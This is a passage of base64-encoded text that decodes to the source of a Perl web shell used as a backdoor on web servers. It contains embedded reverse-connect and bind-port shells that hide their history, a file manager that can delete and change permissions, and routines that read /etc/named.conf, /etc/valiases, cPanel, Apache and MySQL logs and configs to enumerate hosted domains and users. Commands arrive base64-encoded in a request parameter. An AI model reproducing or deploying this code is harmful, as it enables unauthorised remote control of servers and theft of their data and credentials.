NpQmthV1VnY0hKcGJuUWdJbHN0WFNCVmJtRmliR1VnZEc4Z1VtVnpiMngyWlNCSWIzTjBYRzRpT3cwS1kyOXVibVZqZENoVFQwTkxSVlFzSUhOdlkydGhaR1J5WDJsdUtDUkJVa2RXV3pGZExDQnBibVYwWDJGMGIyNG9KRUZTUjFaYk1GMHBLU2tnYjNJZ1pHbGxJSEJ5YVc1MElDSmJMVjBnVlc1aFlteGxJSFJ2SUVOdmJtNWxZM1FnU0c5emRGeHVJanNOQ25CeWFXNTBJQ0pEYjI1dVpXTjBaV1FoSWpzTkNsTlBRMHRGVkMwK1lYVjBiMlpzZFhOb0tDazdEUXB2Y0dWdUtGTlVSRWxPTENBaVBpWlRUME5MUlZRaUtUc05DbTl3Wlc0b1UxUkVUMVZVTENJK0psTlBRMHRGVkNJcE93MEtiM0JsYmloVFZFUkZVbElzSWo0bVUwOURTMFZVSWlrN0RRcHdjbWx1ZENBaUxTMDlQU0JEYjI1dVpXTjBaV1FnUW1GamEyUnZiM0lnUFQwdExTQWdYRzVjYmlJN0RRcHplWE4wWlcwb0luVnVjMlYwSUVoSlUxUkdTVXhGT3lCMWJuTmxkQ0JUUVZaRlNFbFRWQ0E3WldOb2J5QW5XeXRkSUZONWMzUmxiV2x1Wm04NklDYzdJSFZ1WVcxbElDMWhPMlZqYUc4N1pXTm9ieUFuV3l0ZElGVnpaWEpwYm1adk9pQW5PeUJwWkR0bFkyaHZPMlZqYUc4Z0oxc3JYU0JFYVhKbFkzUnZjbms2SUNjN0lIQjNaRHRsWTJodk95QmxZMmh2SUNkYksxMGdVMmhsYkd3NklDYzdKRk5vWld4c0lpazdEUXBqYkc5elpTQlRUME5MUlZRNyI7DQoJJGJpbmRwZXJsPSJJeUV2ZFhOeUwySnBiaTl3WlhKc0RRcDFjMlVnVTI5amEyVjBPdzBLSkVGU1IwTTlRRUZTUjFZN0RRb2tjRzl5ZEFrOUlDUkJVa2RXV3pCZE93MEtKSEJ5YjNSdkNUMGdaMlYwY0hKdmRHOWllVzVoYldVb0ozUmpjQ2NwT3cwS0pGTm9aV3hzQ1QwZ0lpOWlhVzR2WW1GemFDSTdEUXB6YjJOclpYUW9VMFZTVmtWU0xDQlFSbDlKVGtWVUxDQlRUME5MWDFOVVVrVkJUU3dnSkhCeWIzUnZLVzl5SUdScFpTQWljMjlqYTJWME9pUWhJanNOQ25ObGRITnZZMnR2Y0hRb1UwVlNWa1ZTTENCVFQweGZVMDlEUzBWVUxDQlRUMTlTUlZWVFJVRkVSRklzSUhCaFkyc29JbXdpTENBeEtTbHZjaUJrYVdVZ0luTmxkSE52WTJ0dmNIUTZJQ1FoSWpzTkNtSnBibVFvVTBWU1ZrVlNMQ0J6YjJOcllXUmtjbDlwYmlna2NHOXlkQ3dnU1U1QlJFUlNYMEZPV1NrcGIzSWdaR2xsSUNKaWFXNWtPaUFrSVNJN0RRcHNhWE4wWlc0b1UwVlNWa1ZTTENCVFQwMUJXRU5QVGs0cENRbHZjaUJrYVdVZ0lteHBjM1JsYmpvZ0pDRWlPdzBLWm05eUtEc2dKSEJoWkdSeUlEMGdZV05qWlhCMEtFTk1TVVZPVkN3Z1UwVlNWa1ZTS1RzZ1kyeHZjMlVnUTB4SlJVNVVLUTBLZXcwS0NXOXdaVzRvVTFSRVNVNHNJQ0krSmtOTVNVVk9WQ0lwT3cwS0NXOXdaVzRvVTFSRVQxVlVMQ0FpUGlaRFRFbEZUbFFpS1RzTkNnbHZjR1Z1S0ZOVVJFVlNVaXdnSWo0bVEweEpSVTVVSWlrN0RRb0pjM2x6ZEdWdEtDSjFibk5sZENCSVNWTlVSa2xNUlRzZ2RXNXpaWFFnVTBGV1JVaEpVMVFnTzJWamFHOGdKMXNyWFNCVGVYTjBaVzFwYm1adk9pQW5PeUIxYm1GdFpTQXRZVHRsWTJodk8yVmphRzhnSjFzclhTQlZjMlZ5YVc1bWJ6b2dKenNnYVdRN1pXTm9ienRsWTJodklDZGJLMTBnUkdseVpXTjBiM0o1T2lBbk95QndkMlE3WldOb2J6c2daV05vYnlBbld5dGRJRk5vWld4c09pQW5PeVJUYUdWc2JDSXBPdzBLQ1dOc2IzTmxLRk5VUkVsT0tUc05DZ2xqYkc5elpTaFRWRVJQVlZRcE93MEtDV05zYjNObEtGTlVSRVZTVWlrN0RRcDlEUW89IjsNCg0KCSRDbGllbnRBZGRyID0gJGlueydjbGllbnRhZGRyJ307DQoJJENsaWVudFBvcnQgPSBpbnQoJGlueydjbGllbnRwb3J0J30pOw0KCWlmKCRDbGllbnRQb3J0IGVxIDApDQoJew0KCQlyZXR1cm4gJkJhY2tCaW5kRm9ybTsNCgl9ZWxzaWYoISRDbGllbnRBZGRyIGVxICIiKQ0KCXsNCgkJJERhdGE9ZGVjb2RlX2Jhc2U2NCgkYmFja3BlcmwpOw0KCQlpZigtdyAiL3RtcC8iKQ0KCQl7DQoJCQkkRmlsZT0iL3RtcC9iYWNrY29ubmVjdC5wbCI7CQ0KCQl9ZWxzZQ0KCQl7DQoJCQkkRmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4iYmFja2Nvbm5lY3QucGwiOw0KCQl9DQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOw0KCQlwcmludCBGSUxFICREYXRhOw0KCQljbG9zZSBGSUxFOw0KCQlzeXN0ZW0oInBlcmwgJEZpbGUgJENsaWVudEFkZHIgJENsaWVudFBvcnQiKTsNCgkJdW5saW5rKCRGaWxlKTsNCgkJZXhpdCAwOw0KCX1lbHNlDQoJew0KCQkkRGF0YT1kZWNvZGVfYmFzZTY0KCRiaW5kcGVybCk7DQoJCWlmKC13ICIvdG1wIikNCgkJew0KCQkJJEZpbGU9Ii90bXAvYmluZHBvcnQucGwiOwkNCgkJfWVsc2UNCgkJew0KCQkJJEZpbGU9JEN1cnJlbnREaXIuJFBhdGhTZXAuImJpbmRwb3J0LnBsIjsNCgkJfQ0KCQlvcGVuKEZJTEUsICI+JEZpbGUiKTsNCgkJcHJpbnQgRklMRSAkRGF0YTsNCgkJY2xvc2UgRklMRTsNCgkJc3lzdGVtKCJwZXJsICRGaWxlICRDbGllbnRQb3J0Iik7DQoJCXVubGluaygkRmlsZSk7DQoJCWV4aXQgMDsNCgl9DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojICBBcnJheSBMaXN0IERpcmVjdG9yeQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFJtRGlyKCQpIA0Kew0KCW15ICRkaXIgPSBzaGlmdDsNCglpZihvcGVuZGlyKERJUiwkZGlyKSkNCgl7DQoJCXdoaWxlKCRmaWxlID0gcmVhZGRpcihESVIpKQ0KCQl7DQoJCQlpZigoJGZpbGUgbmUgIi4iKSAmJiAoJGZpbGUgbmUgIi4uIikpDQoJCQl7DQoJCQkJJGZpbGU9ICRkaXIuJFBhdGhTZXAuJGZpbGU7DQoJCQkJaWYoLWQgJGZpbGUpDQoJCQkJew0KCQkJCQkmUm1EaXIoJGZpbGUpOw0KCQkJCX0NCgkJCQllbHNlDQoJCQkJew0KCQkJCQl1bmxpbmsoJGZpbGUpOw0KCQkJCX0NCgkJCX0NCgkJfQ0KCQljbG9zZWRpcihESVIpOw0KCX0NCn0NCnN1YiBGaWxlT3duZXIoJCkNCnsNCglteSAkZmlsZSA9IHNoaWZ0Ow0KCWlmKC1lICRmaWxlKQ0KCXsNCgkJKCR1aWQsJGdpZCkgPSAoc3RhdCgkZmlsZSkpWzQsNV07DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJcmV0dXJuICI/Pz8iOw0KCQl9DQoJCWVsc2UNCgkJew0KCQkJJG5hbWU9Z2V0cHd1aWQoJHVpZCk7DQoJCQkkZ3JvdXA9Z2V0Z3JnaWQoJGdpZCk7DQoJCQlyZXR1cm4gJG5hbWUuIi8iLiRncm91cDsNCgkJfQ0KCX0NCglyZXR1cm4gIj8/PyI7DQp9DQpzdWIgUGFyZW50Rm9sZGVyKCQpDQp7DQoJbXkgJHBhdGggPSBzaGlmdDsNCglteSAkQ29tbSA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkIC4uIi4kQ21kU2VwLiRDbWRQd2Q7DQoJY2hvcCgkcGF0aCA9IGAkQ29tbWApOw0KCXJldHVybiAkcGF0aDsNCn0NCnN1YiBGaWxlUGVybXMoJCkNCnsNCglteSAkZmlsZSA9IHNoaWZ0Ow0KCW15ICR1ciA9ICItIjsNCglteSAkdXcgPSAiLSI7DQoJaWYoLWUgJGZpbGUpDQoJew0KCQlpZigkV2luTlQpDQoJCXsNCgkJCWlmKC1yICRmaWxlKXsgJHVyID0gInIiOyB9DQoJCQlpZigtdyAkZmlsZSl7ICR1dyA9ICJ3IjsgfQ0KCQkJcmV0dXJuICR1ciAuICIgLyAiIC4gJHV3Ow0KCQl9ZWxzZQ0KCQl7DQoJCQkkbW9kZT0oc3RhdCgkZmlsZSkpWzJdOw0KCQkJJHJlc3VsdCA9IHNwcmludGYoIiUwNG8iLCAkbW9kZSAmIDA3Nzc3KTsNCgkJCXJldHVybiAkcmVzdWx0Ow0KCQl9DQoJfQ0KCXJldHVybiAiMDAwMCI7DQp9DQpzdWIgRmlsZUxhc3RNb2RpZmllZCgkKQ0Kew0KCW15ICRmaWxlID0gc2hpZnQ7DQoJaWYoLWUgJGZpbGUpDQoJew0KCQkoJGxhKSA9IChzdGF0KCRmaWxlKSlbOV07DQoJCSgkZCwkbSwkeSwkaCwkaSkgPSAobG9jYWx0aW1lKCRsYSkpWzMsNCw1LDIsMV07DQoJCSR5ID0gJHkgKyAxOTAwOw0KCQlAbW9udGggPSBxdy8xIDIgMyA0IDUgNiA3IDggOSAxMCAxMSAxMi87DQoJCSRsbXRpbWUgPSBzcHJpbnRmKCIlMDJkLyVzLyU0ZCAlMDJkOiUwMmQiLCRkLCRtb250aFskbV0sJHksJGgsJGkpOw0KCQlyZXR1cm4gJGxtdGltZTsNCgl9DQoJcmV0dXJuICI/Pz8iOw0KfQ0Kc3ViIEZpbGVTaXplKCQpDQp7DQoJbXkgJGZpbGUgPSBzaGlmdDsNCglpZigtZiAkZmlsZSkNCgl7DQoJCXJldHVybiAtcyAiJGZpbGUiOw0KCX0NCglyZXR1cm4gIjAiOw0KfQ0Kc3ViIFBhcnNlRmlsZVNpemUoJCkNCnsNCglteSAkc2l6ZSA9IHNoaWZ0Ow0KCWlmKCRzaXplIDw9IDEwMjQpDQoJew0KCQlyZXR1cm4gJHNpemUuICIgQiI7DQoJfQ0KCWVsc2UNCgl7DQoJCWlmKCRzaXplIDw9IDEwMjQqMTAyNCkgDQoJCXsNCgkJCSRzaXplID0gc3ByaW50ZigiJS4wMmYiLCRzaXplIC8gMTAyNCk7DQoJCQlyZXR1cm4gJHNpemUuIiBLQiI7DQoJCX0NCgkJZWxzZSANCgkJew0KCQkJJHNpemUgPSBzcHJpbnRmKCIlLjJmIiwkc2l6ZSAvIDEwMjQgLyAxMDI0KTsNCgkJCXJldHVybiAkc2l6ZS4iIE1CIjsNCgkJfQ0KCX0NCn0NCnN1YiB0cmltKCQpDQp7DQoJbXkgJHN0cmluZyA9IHNoaWZ0Ow0KCSRzdHJpbmcgPX4gcy9eXHMrLy87DQoJJHN0cmluZyA9fiBzL1xzKyQvLzsNCglyZXR1cm4gJHN0cmluZzsNCn0NCnN1YiBBZGRTbGFzaGVzKCQpDQp7DQoJbXkgJHN0cmluZyA9IHNoaWZ0Ow0KCSRzdHJpbmc9fiBzL1xcL1xcXFwvZzsNCglyZXR1cm4gJHN0cmluZzsNCn0NCnN1YiBUcmltU2xhc2hlcygkKQ0Kew0KCW15ICRzdHJpbmcgPSBzaGlmdDsNCgkkc3RyaW5nPX4gcy9cL1wvL1wvL2c7DQoJJHN0cmluZz1+IHMvXFxcXC9cXC9nOw0KCXJldHVybiAkc3RyaW5nOw0KfQ0Kc3ViIExpc3REaXINCnsNCglteSAkcGF0aCA9ICZUcmltU2xhc2hlcygkQ3VycmVudERpci4kUGF0aFNlcCk7DQoJbXkgJHJlc3VsdCA9ICI8Zm9ybSBuYW1lPSdmJyBvblN1Ym1pdD1cIkVuY29kZXIoJ2QnKVwiIGFjdGlvbj0nJFNjcmlwdExvY2F0aW9uJz48c3BhbiBzdHlsZT0nZm9udDogMTFwdCBWZXJkYW5hOyBmb250LXdlaWdodDogYm9sZDsnPlBhdGg6IFsgIi4mQWRkTGlua0RpcigiZ3VpIikuIiBdIDwvc3Bhbj48aW5wdXQgdHlwZT0ndGV4dCcgaWQ9J2QnIG5hbWU9J2QnIHNpemU9JzQwJyB2YWx1ZT0nJEN1cnJlbnREaXInIC8+PGlucHV0IHR5cGU9J2hpZGRlbicgbmFtZT0nYScgdmFsdWU9J2d1aSc+PGlucHV0IGNsYXNzPSdzdWJtaXQnIHR5cGU9J3N1Ym1pdCcgdmFsdWU9J0NoYW5nZSc+PC9mb3JtPiI7DQoJaWYoLWQgJHBhdGgpDQoJew0KCQlteSBAZm5hbWUgPSAoKTsNCgkJbXkgQGRuYW1lID0gKCk7DQoJCWlmKG9wZW5kaXIoRElSLCRwYXRoKSkNCgkJew0KCQkJd2hpbGUoJGZpbGUgPSByZWFkZGlyKERJUikpDQoJCQl7DQoJCQkJJGY9JHBhdGguJGZpbGU7DQoJCQkJaWYoLWQgJGYpDQoJCQkJew0KCQkJCQlwdXNoKEBkbmFtZSwkZmlsZSk7DQoJCQkJfQ0KCQkJCWVsc2UNCgkJCQl7DQoJCQkJCXB1c2goQGZuYW1lLCRmaWxlKTsNCgkJCQl9DQoJCQl9DQoJCQljbG9zZWRpcihESVIpOw0KCQl9DQoJCUBmbmFtZSA9IHNvcnQgeyBsYygkYSkgY21wIGxjKCRiKSB9IEBmbmFtZTsNCgkJQGRuYW1lID0gc29ydCB7IGxjKCRhKSBjbXAgbGMoJGIpIH0gQGRuYW1lOw0KCQkkcmVzdWx0IC49ICI8ZGl2Pjx0YWJsZSB3aWR0aD0nOTAlJyBjbGFzcz0nbGlzdGRpcic+DQoJCTx0ciBzdHlsZT0nYmFja2dyb3VuZC1jb2xvcjogIzNlM2UzZSc+PHRoPkZpbGUgTmFtZTwvdGg+DQoJCTx0aCB3aWR0aD0nMTAwJz5GaWxlIFNpemU8L3RoPg0KCQk8dGggd2lkdGg9JzE1MCc+T3duZXI8L3RoPg0KCQk8dGggd2lkdGg9JzEwMCc+UGVybWlzc2lvbjwvdGg+DQoJCTx0aCB3aWR0aD0nMTUwJz5MYXN0IE1vZGlmaWVkPC90aD4NCgkJPHRoIHdpZHRoPScyMzAnPkFjdGlvbjwvdGg+PC90cj4iOw0KCQlteSAkc3R5bGU9Im5vdGxpbmUiOw0KCQlteSAkaT0wOw0KCQlmb3JlYWNoIG15ICRkIChAZG5hbWUpDQoJCXsNCgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7DQoJCQkkZCA9ICZ0cmltKCRkKTsNCgkJCSRkaXJuYW1lPSRkOw0KCQkJaWYoJGQgZXEgIi4uIikgDQoJCQl7DQoJCQkJJGQgPSAmUGFyZW50Rm9sZGVyKCRwYXRoKTsNCgkJCX0NCgkJCWVsc2lmKCRkIGVxICIuIikgDQoJCQl7DQoJCQkJbmV4dDsNCgkJCX0NCgkJCWVsc2UgDQoJCQl7DQoJCQkJJGQgPSAkcGF0aC4kZDsNCgkJCX0NCgkJCSRyZXN1bHQgLj0gIjx0ciBjbGFzcz0nJHN0eWxlJz48dGQgaWQ9J0ZpbGVfJGknIGNsYXNzPSdkaXInPjxhICBocmVmPSc/YT1ndWkmZD0iLiZFbmNvZGVEaXIoJGQpLiInPlsgIi4kZGlybmFtZS4iIF08L2E+PC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPHRkPkRJUjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZD4iLiZGaWxlT3duZXIoJGQpLiI8L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8dGQgaWQ9J0ZpbGVQZXJtc18kaScgb25kYmxjbGljaz1cInJtX2NobW9kX2Zvcm0odGhpcywiLiRpLiIsJyIuJkZpbGVQZXJtcygkZCkuIicsJyIuJGRpcm5hbWUuIicpXCIgPjxzcGFuIG9uY2xpY2s9XCJjaG1vZF9mb3JtKCIuJGkuIiwnIi4kZGlybmFtZS4iJylcIiA+Ii4mRmlsZVBlcm1zKCRkKS4iPC9zcGFuPjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZD4iLiZGaWxlTGFzdE1vZGlmaWVkKCRkKS4iPC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPHRkPjxhIG9uY2xpY2s9XCJyZW5hbWVfZm9ybSgkaSwnJGRpcm5hbWUnLCciLiZBZGRTbGFzaGVzKCZBZGRTbGFzaGVzKCRkKSkuIicpOyByZXR1cm4gZmFsc2U7IFwiPlJlbmFtZTwvYT4gIHwgPGEgb25jbGljaz1cImlmKCFjb25maXJtKCdSZW1vdmUgZGlyOiAkZGlybmFtZSA/JykpIHsgcmV0dXJuIGZhbHNlO31cIiBocmVmPSc/YT1ndWkmZD0iLiZFbmNvZGVEaXIoJHBhdGgpLiImcmVtb3ZlPSRkaXJuYW1lJz5SZW1vdmU8L2E+PC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPC90cj4iOw0KCQkJJGkrKzsNCgkJfQ0KCQlmb3JlYWNoIG15ICRmIChAZm5hbWUpDQoJCXsNCgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7DQoJCQkkZmlsZT0kZjsNCgkJCSRmID0gJHBhdGguJGY7DQoJCQlteSAkYWN0aW9uID0gZW5jb2RlX2Jhc2U2NCgiZWRpdCAiLiRmaWxlKTsNCgkJCSR2aWV3ID0gIj9kaXI9Ii4kcGF0aC4iJnZpZXc9Ii4kZjsNCgkJCSRyZXN1bHQgLj0gIjx0ciBjbGFzcz0nJHN0eWxlJz48dGQgaWQ9J0ZpbGVfJGknIGNsYXNzPSdmaWxlJz48YSBocmVmPSc/YT1jb21tYW5kJmQ9Ii4mRW5jb2RlRGlyKCRwYXRoKS4iJmM9Ii4kYWN0aW9uLiInPiIuJGZpbGUuIjwvYT48L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8dGQ+Ii4mUGFyc2VGaWxlU2l6ZSgmRmlsZVNpemUoJGYpKS4iPC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPHRkPiIuJkZpbGVPd25lcigkZikuIjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZCBpZD0nRmlsZVBlcm1zXyRpJyBvbmRibGNsaWNrPVwicm1fY2htb2RfZm9ybSh0aGlzLCIuJGkuIiwnIi4mRmlsZVBlcm1zKCRmKS4iJywnIi4kZmlsZS4iJylcIiA+PHNwYW4gb25jbGljaz1cImNobW9kX2Zvcm0oJGksJyRmaWxlJylcIiA+Ii4mRmlsZVBlcm1zKCRmKS4iPC9zcGFuPjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZD4iLiZGaWxlTGFzdE1vZGlmaWVkKCRmKS4iPC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPHRkPjxhIG9uY2xpY2s9XCJyZW5hbWVfZm9ybSgkaSwnJGZpbGUnLCdmJyk7IHJldHVybiBmYWxzZTtcIj5SZW5hbWU8L2E+IHwgPGEgaHJlZj0nP2E9ZG93bmxvYWQmbz1nbyZmPSIuJGYuIic+RG93bmxvYWQ8L2E+IHwgPGEgb25jbGljaz1cImlmKCFjb25maXJtKCdSZW1vdmUgZmlsZTogJGZpbGUgPycpKSB7IHJldHVybiBmYWxzZTt9XCIgaHJlZj0nP2E9Z3VpJmQ9Ii4mRW5jb2RlRGlyKCRwYXRoKS4iJnJlbW92ZT0kZmlsZSc+UmVtb3ZlPC9hPjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjwvdHI+IjsNCgkJCSRpKys7DQoJCX0NCgkJJHJlc3VsdCAuPSAiPC90YWJsZT48L2Rpdj4iOw0KCX0NCglyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVHJ5IHRvIFZpZXcgTGlzdCBVc2VyDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgVmlld0RvbWFpblVzZXINCnsNCglvcGVuIChkMG1haW5zLCAnL2V0Yy9uYW1lZC5jb25mJykgb3IgJGVycj0xOw0KCW15IEBjbnpzID0gPGQwbWFpbnM+Ow0KCWNsb3NlIGQwbWFpbnM7DQoJbXkgJHN0eWxlPSJsaW5lIjsNCglteSAkcmVzdWx0PSI8aDM+PGZvbnQgc3R5bGU9J2ZvbnQ6IDE1cHQgVmVyZGFuYTtjb2xvcjogI2ZmOTkwMDsnPkRvbWFpbiArIFVzZXI8L2ZvbnQ+PC9oMz4iOw0KCWlmICgkZXJyKQ0KCXsNCgkJJHJlc3VsdCAuPSAgKCc8cD5DMHVsZG5cJ3QgQnlwYXNzIGl0ICwgU29ycnk8L3A+Jyk7DQoJCXJldHVybiAkcmVzdWx0Ow0KCX1lbHNlDQoJew0KCQkkcmVzdWx0IC49ICc8dGFibGUgaWQ9ImRvbWFpbiI+PHRyPjx0aD5kMG1haW5zPC90aD4gPHRoPlVzZXI8L3RoPjwvdHI+JzsNCgl9DQoJZm9yZWFjaCBteSAkb25lIChAY256cykNCgl7DQoJCWlmKCRvbmUgPX4gbS8uKj96b25lICIoLio/KSIgey8pDQoJCXsJDQoJCQkkc3R5bGU9ICgkc3R5bGUgZXEgImxpbmUiKSA/ICJub3RsaW5lIjogImxpbmUiOw0KCQkJJGZpbGVuYW1lPSB0cmltKCIvZXRjL3ZhbGlhc2VzLyIuJDEpOw0KCQkJJG93bmVyID0gZ2V0cHd1aWQoKHN0YXQoJGZpbGVuYW1lKSlbNF0pOw0KCQkJJHJlc3VsdCAuPSAnPHRyIHN0eWxlPSIkc3R5bGUiIHdpZHRoPTUwJT48dGQ+PGEgaHJlZj0iaHR0cDovLycuJDEuJyIgdGFyZ2V0PSJfYmxhbmsiPicuJDEuJzwvYT48L3RkPjx0ZD4gJy4kb3duZXIuJzwvdGQ+PC90cj4nOw0KCQl9DQoJfQ0KCSRyZXN1bHQgLj0gJzwvdGFibGU+JzsNCglyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVmlldyBMb2cNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBWaWV3TG9nDQp7DQoJJEVuY29kZUN1cnJlbnREaXIgPSBFbmNvZGVEaXIoJEN1cnJlbnREaXIpOw0KCWlmKCRXaW5OVCkNCgl7DQoJCXJldHVybiAiPGgyPjxmb250IHN0eWxlPSdmb250OiAyMHB0IFZlcmRhbmE7Y29sb3I6ICNmZjk5MDA7Jz5Eb24ndCBydW4gb24gV2luZG93czwvZm9udD48L2gyPiI7DQoJfQ0KCW15ICRyZXN1bHQ9Ijx0YWJsZT48dHI+PHRoPlBhdGggTG9nPC90aD48dGg+U3VibWl0PC90aD48L3RyPiI7DQoJbXkgQHBhdGhsb2c9KAknL3Vzci9sb2NhbC9hcGFjaGUvbG9ncy9lcnJvcl9sb2cnLA0KCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvYWNjZXNzX2xvZycsDQoJCQknL3Vzci9sb2NhbC9hcGFjaGUyL2NvbmYvaHR0cGQuY29uZicsDQoJCQknL3Zhci9sb2cvaHR0cGQvZXJyb3JfbG9nJywNCgkJCScvdmFyL2xvZy9odHRwZC9hY2Nlc3NfbG9nJywNCgkJCScvdXNyL2xvY2FsL2NwYW5lbC9sb2dzL2Vycm9yX2xvZycsDQoJCQknL3Vzci9sb2NhbC9jcGFuZWwvbG9ncy9hY2Nlc3NfbG9nJywNCgkJCScvdXNyL2xvY2FsL2FwYWNoZS9sb2dzL3N1cGhwX2xvZycsDQoJCQknL3Vzci9sb2NhbC9jcGFuZWwvbG9ncycsDQoJCQknL3Vzci9sb2NhbC9jcGFuZWwvbG9ncy9zdGF0c19sb2cnLA0KCQkJJy91c3IvbG9jYWwvY3BhbmVsL2xvZ3MvYWNjZXNzX2xvZycsDQoJCQknL3Vzci9sb2NhbC9jcGFuZWwvbG9ncy9lcnJvcl9sb2cnLA0KCQkJJy91c3IvbG9jYWwvY3BhbmVsL2xvZ3MvbGljZW5zZV9sb2cnLA0KCQkJJy91c3IvbG9jYWwvY3BhbmVsL2xvZ3MvbG9naW5fbG9nJywNCgkJCScvdXNyL2xvY2FsL2NwYW5lbC9sb2dzL3N0YXRzX2xvZycsDQoJCQknL3Zhci9jcGFuZWwvY3BhbmVsLmNvbmZpZycsDQoJCQknL3Vzci9sb2NhbC9waHAvbGliL3BocC5pbmknLA0KCQkJJy91c3IvbG9jYWwvcGhwNS9saWIvcGhwLmluaScsDQoJCQknL3Zhci9sb2cvbXlzcWwvbXlzcWwtYmluLmxvZycsDQoJCQknL3Zhci9sb2cvbXlzcWwubG9nJywNCgkJCScvdmFyL2xvZy9teXNxbGRlcnJvci5sb2cnLA0KCQkJJy92YXIvbG9nL215c3FsL215c3FsLmxvZycsDQoJCQknL3Zhci9sb2cvbXlzcWwvbXlzcWwtc2xvdy5sb2cnLA0KCQkJJy92YXIvbXlzcWwubG9nJywNCgkJCScvdmFyL2xpYi9teXNxbC9teS5jbmYnLA0KCQkJJy9ldGMvbXlzcWwvbXkuY25mJywNCgkJCScvZXRjL215LmNuZicsDQoJCQkpOw0KCW15ICRpPTA7DQoJbXkgJHBlcm1zOw0KCW15ICRzbDsNCglmb3JlYWNoIG15ICRsb2cgKEBwYXRobG9nKQ0KCXsNCgkJaWYoLXIgJGxvZykNCgkJew0KCQkJJHBlcm1zPSJPSyI7DQoJCX1lbHNlDQoJCXsNCgkJCSRwZXJtcz0iPGZvbnQgc3R5bGU9J2NvbG9yOiByZWQ7Jz5DYW5jZWw8Zm9udD4iOw0KCQl9DQoJCSRyZXN1bHQgLj08PEVORDsNCgkJPHRyPg0KDQoJCQk8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBvblN1Ym1pdD0iRW5jb2RlcignbG9nJGknKSI+DQoJCQk8dGQ+PGlucHV0IHR5cGU9InRleHQiIGlkPSJsb2ckaSIgbmFtZT0iYyIgdmFsdWU9InRhaWwgLTEwMDAwICRsb2cgfCBncmVwICcvaG9tZSciIHNpemU9JzUwJy8+PC90ZD4NCgkJCTx0ZD48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iVHJ5IiAvPjwvdGQ+DQoJCQk8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCIgLz4NCgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkRW5jb2RlQ3VycmVudERpciIgLz4NCgkJCTwvZm9ybT4NCgkJCTx0ZD4kcGVybXM8L3RkPg0KDQoJCTwvdHI+DQpFTkQNCgkJJGkrKzsNCgl9DQoJJHJlc3VsdCAuPSI8L3RhYmxlPiI7DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIE1haW4gUHJvZ3JhbSAtIEV4ZWN1dGlvbiBTdGFydHMgSGVyZQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KJlJlYWRQYXJzZTsNCiZHZXRDb29raWVzOw0KDQokU2NyaXB0TG9jYXRpb24gPSAkRU5WeydTQ1JJUFRfTkFNRSd9Ow0KJFNlcnZlck5hbWUgPSAkRU5WeydTRVJWRVJfTkFNRSd9Ow0KJExvZ2luUGFzc3dvcmQgPSAkaW57J3AnfTsNCiRSdW5Db21tYW5kID0gZGVjb2RlX2Jhc2U2NCgkaW57J2MnfSk7DQokVHJhbnNmZXJGaWxlID0gJGlueydmJ307DQokT3B0aW9ucyA9ICRpbnsnbyd9Ow0KJEFjdGlvbiA9ICRpbnsnYSd9Ow0KDQokQWN0aW9uID0gImNvbW1hbmQiIGlmKCRBY3Rpb24gZXEgIiIpOyAjIG5vIGFjdGlvbiBzcGVjaWZpZWQsIHVzZSBkZWZhdWx0DQoNCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYm